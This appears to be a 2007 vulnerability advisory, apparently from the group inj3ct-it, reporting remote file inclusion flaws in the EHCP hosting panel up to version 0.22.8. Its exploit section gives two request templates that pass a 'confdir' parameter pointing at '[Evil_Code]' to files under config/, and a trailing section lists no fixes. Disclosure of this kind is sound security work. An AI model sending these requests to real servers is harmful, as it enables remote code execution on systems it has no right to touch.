EHCP <= 0.22.8 Multiple Remote File Inclusion Vulnerabilities

2007-11-28 00:00:00

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Multiple Remote File Inclusion

---------------------------------------------------------------

# Author: MhZ91 [email protected]

# Download Script: http://sourceforge.net/projects/ehcp

# register_globals = On

# Exploit

# http://[site]/[path]/config/dbutil.bck.php?confdir=[Evil_Code]

# http://[site]/[path]/config/dbutil.php?confdir=[Evil_Code]

---------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.